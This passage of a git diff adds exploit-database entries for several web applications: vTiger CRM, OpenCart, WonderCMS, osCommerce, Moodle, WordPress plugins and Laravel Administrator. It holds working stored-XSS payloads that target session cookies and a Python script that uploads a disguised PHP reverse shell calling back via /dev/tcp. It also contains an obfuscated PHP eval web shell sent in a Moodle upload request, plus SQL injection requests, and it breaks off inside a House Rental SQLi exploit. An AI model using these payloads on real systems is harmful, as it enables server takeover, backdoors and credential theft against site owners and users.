+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Guest Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Full Disclosure
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in
+the official VTiger v7.0 CRM open-source web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The persistent cross site scripting web vulnerability is located in the
+`searchValue` Parameter of the `Emails Compose` module.
+Attackers are able to inject own mlicious script code in the `To` sender
+input field of the email compose module to attack other
+user accounts. The email can be delivered with multiple receipients
+which allows an attacker to insert the target email and a
+malicious payload. The request method to inject is GET via searchValue
+and POST on compose with persistent attack vector.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external
+redirects to malicious source and persistent manipulation of affected
+application modules.
+
+Request Method(s):
+[+] POST
+[+] GET
+
+Vulnerable Module(s):
+[+] Email Compose (index.php?module=Emails)
+
+Vulnerable Input(s):
+[+] To (Sender - Email)
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerability can be exploited by
+remote attackers with low privileged account and with low user interaction.
+For security demonstration or to reproduce the cross site web
+vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Url
+http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY#
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the web-application ui
+2. Login with a regular user role to the ui
+3. Open vendors and move to compose to email form
+4. Inject malicious payload as "to" sender information and as well a
+valid email to target
+5. Send the request after the compose
+6. Wait until the administrator or higher privileged targeted users
+click in the email or receives the email on preview
+7. Successful reproduce of the cross site scripting web vulnerability!
+
+
+PoC: Vulnerable Source (Execution Point)
+<div class="col-lg-12"><div class="col-lg-2"><span
+class="pull-right">To&nbsp;<span class="redColor">*</span></span></div>
+<div class="col-lg-6"><div class="select2-container
+select2-container-multi autoComplete sourceField select2"
+id="s2id_emailField" style="width: 100%;"><ul class="select2-choices
+ui-sortable">  <li class="select2-search-choice">
+<div>IT <b>(test@test.com)</b></div>    <a href="#"
+class="select2-search-choice-close" tabindex="-1"></a></li>
+<li class="select2-search-choice"><div><iframe src"evil.source"
+onload=alert(document.cookie)></div></iframe></div>
+
+
+--- PoC Session Logs [GET] ---
+http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=>"<iframe+src%3Da+onload%3Dalert(document.cookie)>&_=1587844428851
+Host: localhost:8080
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+Referer:
+http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY
+Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.4.10 (Debian)
+Content-Length: 28
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+-
+Content-Type: text/json; charset=UTF-8
+http://localhost:8080/vtigercrm/evil.source
+Host: localhost:8080
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer:
+http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY
+Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.4.10
+Content-Length: 299
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Content-Type: text/html; charset=iso-8859-1
+
+
+Reference(s):
+http://localhost:8080/vtigercrm/
+http://localhost:8080/vtigercrm/index.php
+http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=
+
+
+Security Risk:
+==============
+The security risk of the persistent web vulnerability i the
+web-application is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/exploits/php/webapps/49098.txt b/exploits/php/webapps/49098.txt
new file mode 100644
index 000000000..d893e0108
--- /dev/null
+++ b/exploits/php/webapps/49098.txt
@@ -0,0 +1,20 @@
+# Exploit Title: OpenCart 3.0.3.6 - 'Profile Image' Stored Cross Site Scripting (Authenticated)
+# Date: 24-11-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://www.opencart.com/index.php?route=cms/download
+# Version: 3.0.3.6
+# Tested on: Windows 10/Kali Linux
+
+Vulnerable Parameters: Profile Image.
+
+Steps-To-Reproduce:
+1. Go to the opencart admin page.
+
+2. Now go to the profile page.
+
+* Before the next step write this in notepad ""><svg onload=alert("XSS")>" and save it as an payload.png
+
+3. Now edit the image and uplaod the image as payload.png.
+
+4. The XSS will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49099.txt b/exploits/php/webapps/49099.txt
new file mode 100644
index 000000000..63cf898bc
--- /dev/null
+++ b/exploits/php/webapps/49099.txt
@@ -0,0 +1,43 @@
+# Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
+# Date: 24-11-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://www.opencart.com/index.php?route=cms/download
+# Version: 3.0.3.6
+# Tested on: Windows 10/Kali Linux
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Subject field of the mail and each time any user will open that mail of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Subject of mail.
+
+Steps-To-Reproduce:
+1. Go to the opencart admin page.
+2. Now go to the Marketing-Mail option.
+3. Put the below payload in subject field of the Mail
+: "<script>alert(123)</script>"
+5. Now click on send button.
+6. The XSS will be triggered.
+
+POST /admin/index.php?route=marketing/contact/send&user_token=hYt4UTixry8NDaXiuhXO5mzuahIcOIO5 HTTP/1.1
+Host: localhost
+Connection: close
+Content-Length: 206
+Accept: application/json, text/javascript, */*; q=0.01
+DNT: 1
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: localhost/admin/index.php?route=marketing/contact&user_token=hYt4UTixry8NDaXiuhXO5mzuahIcOIO5
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
+Cookie: __cfduid=d6a6bab42bd30fb2b2e20cad3dd5a80ed1606187757;
+
+store_id=0&to=newsletter&customer_group_id=1&customers=&affiliates=&products=&subject=hemantsolo%22%2F%3E%3Cscript%3Ealert(123)%3C%2Fscript%3E&message=&=&=&=http%3A%2F%2F&=on&files=&=&=&=&=&file=&=&=&=_self
\ No newline at end of file
diff --git a/exploits/php/webapps/49102.txt b/exploits/php/webapps/49102.txt
new file mode 100644
index 000000000..85afb2c42
--- /dev/null
+++ b/exploits/php/webapps/49102.txt
@@ -0,0 +1,22 @@
+# Exploit Title: WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting
+# Date: 20-11-2020
+# Exploit Author: Mayur Parmar
+# Vendor Homepage: https://www.wondercms.com/
+# Version: 3.1.3
+# Tested on: PopOS
+
+Stored Cross-site scripting(XSS):
+Stored attacks are those where the injected script is permanently stored on the target servers,
+such as in a database, in a message forum, visitor log, comment field, etc.
+The victim then retrieves the malicious script from the server when it requests the stored information.
+Stored XSS is also sometimes referred to as Persistent XSS.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Page keywords and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Page Title.
+
+Steps-To-Reproduce:
+1. Go to the Simple website builder.
+2. Put this payload in Page keywords: Mayur"><img src=x onerror=confirm("XSS")>
+3. Now go to the website and the XSS will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49103.txt b/exploits/php/webapps/49103.txt
new file mode 100644
index 000000000..3d78d40cd
--- /dev/null
+++ b/exploits/php/webapps/49103.txt
@@ -0,0 +1,112 @@
+# Exploit Title: osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting
+# Date: 2020-11-19
+# Exploit Author: Emre Aslan
+# Vendor Homepage: https://www.oscommerce.com/
+# Version: 2.3.4.1
+# Tested on: Windows & XAMPP
+
+==> Tutorial <==
+
+1- Login to admin panel.
+2- Go to the following url. ==> http(s)://(HOST)/catalog/admin/newsletters.php?action=new
+3- Enter the XSS payload into the title section and save it.
+
+==> Vulnerable Parameter <==
+
+title= (post parameter)
+
+==> HTTP Request <==
+
+POST /catalog/admin/newsletters.php?action=insert HTTP/1.1
+Host: (HOST)
+Connection: keep-alive
+Content-Length: 123
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://(HOST)/
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://(HOST)/catalog/admin/newsletters.php?action=new
+Accept-Encoding: gzip, deflate, br
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: osCAdminID=s11ou44m0vrasducn78c6sg
+
+module=newsletter&title="><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img>&content=xss
+
+==> Vulnerable Source Code <==
+
+<div id="contentText">
+    <table border="0" width="100%" cellspacing="0" cellpadding="2">
+      <tr>
+        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
+          <tr>
+            <td class="pageHeading">Newsletter Manager</td>
+            <td class="pageHeading" align="right"><img src="images/pixel_trans.gif" border="0" alt="" width="57" height="40" /></td>
+          </tr>
+        </table></td>
+      </tr>
+      <tr>
+        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
+          <tr>
+            <td valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2">
+              <tr class="dataTableHeadingRow">
+                <td class="dataTableHeadingContent">Newsletters</td>
+                <td class="dataTableHeadingContent" align="right">Size</td>
+                <td class="dataTableHeadingContent" align="right">Module</td>
+                <td class="dataTableHeadingContent" align="center">Sent</td>
+                <td class="dataTableHeadingContent" align="center">Status</td>
+                <td class="dataTableHeadingContent" align="right">Action&nbsp;</td>
+              </tr>
+                  <tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview'">
+                <td class="dataTableContent"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbsp;"><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img></td>
+                <td class="dataTableContent" align="right">3 bytes</td>
+                <td class="dataTableContent" align="right">newsletter</td>
+                <td class="dataTableContent" align="center"><img src="images/icons/cross.gif" border="0" alt="False" title="False" /></td>
+                <td class="dataTableContent" align="center"><img src="images/icons/unlocked.gif" border="0" alt="Unlocked" title="Unlocked" /></td>
+                <td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="" />&nbsp;</td>
+              </tr>
+                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1'">
+                <td class="dataTableContent"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbsp;"><img src=1 href=1 onerror="javascript:alert(1)"></img></td>
+                <td class="dataTableContent" align="right">7 bytes</td>
+                <td class="dataTableContent" align="right">newsletter</td>
+                <td class="dataTableContent" align="center"><img src="images/icons/cross.gif" border="0" alt="False" title="False" /></td>
+                <td class="dataTableContent" align="center"><img src="images/icons/unlocked.gif" border="0" alt="Unlocked" title="Unlocked" /></td>
+                <td class="dataTableContent" align="right"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1"><img src="images/icon_info.gif" border="0" alt="Info" title="Info" /></a>&nbsp;</td>
+              </tr>
+              <tr>
+                <td colspan="6"><table border="0" width="100%" cellspacing="0" cellpadding="2">
+                  <tr>
+                    <td class="smallText" valign="top">Displaying <strong>1</strong> to <strong>2</strong> (of <strong>2</strong> newsletters)</td>
+                    <td class="smallText" align="right">Page 1 of 1</td>
+                  </tr>
+                  <tr>
+                    <td class="smallText" align="right" colspan="2"><span class="tdbLink"><a id="tdb1" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?action=new">New Newsletter</a></span><script type="text/javascript">$("#tdb1").button({icons:{primary:"ui-icon-plus"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script></td>
+                  </tr>
+                </table></td>
+              </tr>
+            </table></td>
+            <td width="25%" valign="top">
+<table border="0" width="100%" cellspacing="0" cellpadding="2">
+  <tr class="infoBoxHeading">
+    <td class="infoBoxHeading"><strong>"><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img></strong></td>
+  </tr>
+</table>
+<table border="0" width="100%" cellspacing="0" cellpadding="2">
+  <tr>
+    <td align="center" class="infoBoxContent"><span class="tdbLink"><a id="tdb2" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview">Preview</a></span><script type="text/javascript">$("#tdb2").button({icons:{primary:"ui-icon-document"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script><span class="tdbLink"><a id="tdb3" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=lock">Lock</a></span><script type="text/javascript">$("#tdb3").button({icons:{primary:"ui-icon-locked"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script></td>
+  </tr>
+  <tr>
+    <td class="infoBoxContent"><br />Date Added: 11/19/2020</td>
+  </tr>
+</table>
+            </td>
+          </tr>
+        </table></td>
+      </tr>
+    </table>
+</div>
\ No newline at end of file
diff --git a/exploits/php/webapps/49107.txt b/exploits/php/webapps/49107.txt
new file mode 100644
index 000000000..b7cecddf2
--- /dev/null
+++ b/exploits/php/webapps/49107.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting
+# Date: 11/27/2020
+# Exploit Author: Ilca Lucian Florin
+# Vendor Homepage: http://demo.themeftc.com/wibar
+# Software Link: https://themeforest.net/item/wibar-responsive-woocommerce-wordpress-theme/20994798
+# Version: 1.1.8
+# Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge
+
+The WordPress theme contains Brands feature which is vulnerable to stored
+cross site scripting. The logo URL parameter is vulnerable to cross site
+scripting. The following vector was used for testing XSS: "><script
+src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>.
+
+In order to reproduce the vulnerability, please follow the next steps:
+
+1. Log in as editor/administrator/contributor/author:
+https://website.com/wp-admin
+2. Go to Brands section
+3. Click add new brand and add a custom brand title
+4. The vulnerable parameter is: Logo URL / <input type="text"
+name="ftc_brand_url" id="ftc_brand_url" value="">
+5. Add the following payload: "><script
+src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> , where
+base64 == alert(document.domain)
+6. Publish
+7. The alert will pop up when a user will visit the website on
+https://website.com/brand/vulnerablebrand.
+
+Evidence:
+
+1. https://ibb.co/1fpYJWN
+2. https://ibb.co/S7j5Sgd
+
+C.V.S.S Score: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L / 7.5 High
\ No newline at end of file
diff --git a/exploits/php/webapps/49109.txt b/exploits/php/webapps/49109.txt
new file mode 100644
index 000000000..b33eeb888
--- /dev/null
+++ b/exploits/php/webapps/49109.txt
@@ -0,0 +1,44 @@
+# Exploit Title: WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting
+# Google Dork: "WonderCMS"
+# Date: 2020-11-27
+# Exploit Author: SunCSR (Sun* Cyber Security Research)
+# Vendor Homepage: https://www.wondercms.com/
+# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
+# Version: 3.1.3
+# Tested on: Ubuntu 20.10
+
+Steps-To-Reproduce:
+1. Login and select button setting
+2. Go to tab Files, and upload file contains payload xss with extension like html, svg, htm
+3. Go to http://target.lc/data/files/<name-file> and trigger XSS
+
+POST /home HTTP/1.1
+Host: wordpress.lc:8081
+Content-Length: 372
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://wordpress.lc:8081
+Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundary6EKP5vjUNS5Icgql
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
+Gecko) Chrome/87.0.4280.66 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://wordpress.lc:8081/
+Accept-Encoding: gzip, deflate
+Accept-Language: vi,vi-VN;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=74me71gverejuaf2bns2n5fpkf
+Connection: close
+
+------WebKitFormBoundary6EKP5vjUNS5Icgql
+Content-Disposition: form-data; name="uploadFile"; filename="xss.html"
+Content-Type: text/html
+
+<script>alert('XSS')</script>
+------WebKitFormBoundary6EKP5vjUNS5Icgql
+Content-Disposition: form-data; name="token"
+
+5d715f2aebdf138f4968fce8dcd3703778c6fb5a1abea40e27eb9280079474da
+------WebKitFormBoundary6EKP5vjUNS5Icgql--
+
+--
\ No newline at end of file
diff --git a/exploits/php/webapps/49112.py b/exploits/php/webapps/49112.py
new file mode 100755
index 000000000..906209983
--- /dev/null
+++ b/exploits/php/webapps/49112.py
@@ -0,0 +1,54 @@
+# Exploit title: Laravel Administrator 4 - Unrestricted File Upload (Authenticated)
+# Author: Victor Campos and Xavi Beltran
+# Contact: vcmartin@protonmail.com
+# Exploit Development: https://xavibel.com/2020/03/23/unrestricted-file-upload-in-frozennode-laravel-administrator/
+# Date: 25/3/2020
+# Software link: https://github.com/FrozenNode/Laravel-Administrator/
+# Version : 4
+# Tested on: Laravel-Administrator 4
+# CVE : CVE-2020-10963
+
+#!/usr/bin/env python
+
+import requests,json,traceback
+from requests.auth import HTTPBasicAuth
+
+
+#Parameters to be set up (ENTER YOUR VALUES)
+#===========================================
+# Listener IP and port
+ip = ""
+port = ""
+#Admin credentials
+user = ""
+password = ""
+#URLs of the web application
+domain = "" # For example "https://www.example.com"
+login_url = "" # For example "/user/login"
+fileupload_url = "" # For example "/admin/categories/image/file_upload"
+uploaded_files_url = "" # For example "/categories/images"
+
+
+
+#Reverse shell payload (DO NOT MODIFY THIS SECTION)
+#==================================================
+#GIF file header
+shell = "GIF89a\r\n"
+#php reverse shell
+shell += "\x3c?php\r\nexec(\"/bin/bash -c \'bash -i \x3e /dev/tcp/" + ip + "/" + port + " 0\x3e&1\'\");?\x3e\r\n"
+
+
+with requests.Session() as s:
+    try:
+        print("\n[+] Logging into the panel")
+        s.post(domain + login_url, data={'email':user,'password':password,'remember': '1'})
+        print("[+] Uploading the malicious file")
+        r = s.post(domain + fileupload_url, files={'name':'Picture.png','file': ('test.php',shell)})
+        print("[+] Response text:")
+        #print(r.text)
+        shell_file = (json.loads(r.text))["filename"]
+        print("[+] Name of uploaded file: " + shell_file)
+        print("\n[+] Executing the reverse shell on " + ip + ":" + port + "...")
+        r = s.get(domain + uploaded_files_url + '/' + shell_file)
+    except Exception as e:
+        print(str(traceback.format_exc()))
\ No newline at end of file
diff --git a/exploits/php/webapps/49114.txt b/exploits/php/webapps/49114.txt
new file mode 100644
index 000000000..0e123c160
--- /dev/null
+++ b/exploits/php/webapps/49114.txt
@@ -0,0 +1,54 @@
+# Exploit Title: Moodle 3.8 - Unrestricted File Upload
+# Date: 2019-09-08
+# Exploit Author: Sirwan Veisi
+# Vendor Homepage: https://moodle.org/
+# Software Link: https://github.com/moodle/moodle
+# Version: Moodle Versions 3.8, 3.7, 3.6, 3.5, 3.4...
+# Tested on: Moodle Version 3.8
+# CWE : CWE-434
+
+I found an Unrestricted Upload vulnerability for Moodle version 3.8 , that
+allows the attacker to upload or transfer files of dangerous types.
+
+
+Example exploitation request:
+
+POST /repository/repository_ajax.php?action=upload HTTP/1.1
+Host: VulnerableHost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
+Gecko/20100101 Firefox/80.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------38898830537874132223151601680
+Content-Length: 2763
+Origin: https://VulnerableHost
+Connection: close
+Referer: https://VulnerableHost/user/files.php
+Cookie: MoodleSession=bpn90khjdh7mq4phs8i9r0caai
+Upgrade-Insecure-Requests: 1
+
+-----------------------------38898830537874132223151601680
+Content-Disposition: form-data; name="repo_upload_file";
+filename="image.php"
+Content-Type: image/jpeg
+
+GIF89a;
+<?php
+$Q=str_replace('kz','','crekzakztkze_kzfunckztkzion');
+$O='"";for%(%$i=%0;$i<$l;){for%($j=0%;($j<$c&%&$i<$l);$%j++,$i+%+%){$o.=$%t{$i';
+$l='_contents(%"php:%//input"),%$m)=%=1){@ob%_start();%@eva%l(@gzunc%o%mpress(%@';
+$C='$k="3%fbd6%8c8"%;$kh="2a%e%7d638909f";$%kf%="60eb0ffaeb%1%7";$p="dP%FT1%';
+$h='x(@b%ase%6%4_decode($m[1%]),$k)));%$o=@o%b_get_conte%%nts();@ob_end%%_c%lean';
+$N='}%%^$k{$j};}}retu%rn
+$o;}i%f(@preg%_matc%%h("/$kh(.+)$%%k%f%/",@file_ge%t';
+$e='Nmy694Bcj%Vc";fu%nction%
+x(%$t,$k){$c=st%rle%n%($%%k);$l=strlen($t)%;$o=';
+$V='();$r=@bas%e64_en%cod%e(@x(@%%gzcomp%ress($o),$k))%;%print("$%p$kh$r$kf");}';
+$P=str_replace('%','',$C.$e.$O.$N.$l.$h.$V);
+$n=$Q('',$P);$n();
+?>
+
+-----------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/49115.txt b/exploits/php/webapps/49115.txt
new file mode 100644
index 000000000..78e58c1c6
--- /dev/null
+++ b/exploits/php/webapps/49115.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)
+# Exploit Author: SunCSR (Sun* Cyber Security Research) - Nguyen Khang
+# Google Dork: N/A
+# Date: 2020-08-24
+# Vendor Homepage: https://accesspressthemes.com
+# Software Link: https://wordpress.org/plugins/accesspress-social-icons/
+# Version: <= 1.7.9
+# Tested on: Ubuntu 18.04
+
+Description:
+A blind SQL injection vulnerability is present in Ajax load more.
+
+<?php
+$si_id = esc_attr($atts['id']);
+global $wpdb;
+$table_name = $table_name = $wpdb->prefix . "aps_social_icons";
+$icon_sets = $wpdb->get_results("SELECT * FROM $table_name where si_id =
+$si_id");
+
+POC:
+POST /wordpress/index.php?rest_route=%2Fwp%2Fv2%2Fposts%2F66&_locale=user
+HTTP/1.1
+Host: pwnme.me
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101
+Firefox/79.0
+Accept: application/json, */*;q=0.1
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://pwnme.me/wordpress/wp-admin/post.php?post=66&action=edit
+X-WP-Nonce: 514cd2ab3f
+X-HTTP-Method-Override: PUT
+Content-Type: application/json
+Origin: http://pwnme.me
+Content-Length: 103
+Connection: close
+Cookie: wp-settings-time-2=1597912773;
+wordpress_test_cookie=WP+Cookie+check;
+wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=author%7C1598405206%7Cwp7Nu56SQz9nIWmkqZr94WFIpGZ6VfcTT5KaYPUULWe%7C3c4c3a80cbfd049b95b04a6104ded9b05f33f8a9900ccec818d5aa43c7102c79;
+wp-settings-time-3=1598234126
+
+{"id":66,"content":"<!-- wp:shortcode -->\n[aps-social id=\"4 and
+sleep(5)\"]\n<!-- /wp:shortcode -->"}
\ No newline at end of file
diff --git a/exploits/php/webapps/49117.txt b/exploits/php/webapps/49117.txt
new file mode 100644
index 000000000..c13a419be
--- /dev/null
+++ b/exploits/php/webapps/49117.txt
@@ -0,0 +1,94 @@
+# Exploit Title: House Rental 1.0 - 'keywords' SQL Injection
+# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) 
+# Date: 2020-08-07
+# Vendor Homepage: https://projectworlds.in
+# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/home-rental.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro (x64_86) + XAMPP | Python 2.7
+# CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
+# OWASP Top Ten 2017: A1:2017-Injection
+# CVSS Base Score: 10.0 | Impact Subscore: 6.0 | Exploitability Subscore: 3.9
+# CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+# Vulnerability Description:
+#   House Rental v1.0 suffers from an unauthenticated SQL Injection vulnerability allowing remote attackers
+#   to execute arbitrary code on the hosting webserver via sending a malicious POST request.
+# Vulnerable Source Code:
+# /config/config.php
+#   11  try {
+#   12     $connect = new PDO("mysql:host=".dbhost."; dbname=".dbname, dbuser, dbpass);
+#   13     $connect->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
+# /index.php
+#    5   if(isset($_POST['search'])) {
+#    7     $keywords = $_POST['keywords'];
+#   11     $keyword = explode(',', $keywords);
+#   12     $concats = "(";
+#   13     $numItems = count($keyword);
+#   15     foreach ($keyword as $key => $value) {
+#   17       if(++$i === $numItems){
+#   18          $concats .= "'".$value."'";
+#   19       }else{
+#   20         $concats .= "'".$value."',";
+#   23     $concats .= ")";
+#   47         $stmt = $connect->prepare("SELECT * FROM room_rental_registrations_apartment WHERE country IN $concats OR country IN $loc OR state IN $concats OR state IN $loc OR city IN $concats OR city IN $loc OR address IN $concats OR address IN $loc OR rooms IN $concats OR landmark IN $concats OR landmark IN $loc OR rent IN $concats OR deposit IN $concats");
+#   48         $stmt->execute();
+
+import requests, sys, re, json
+from colorama import Fore, Back, Style
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
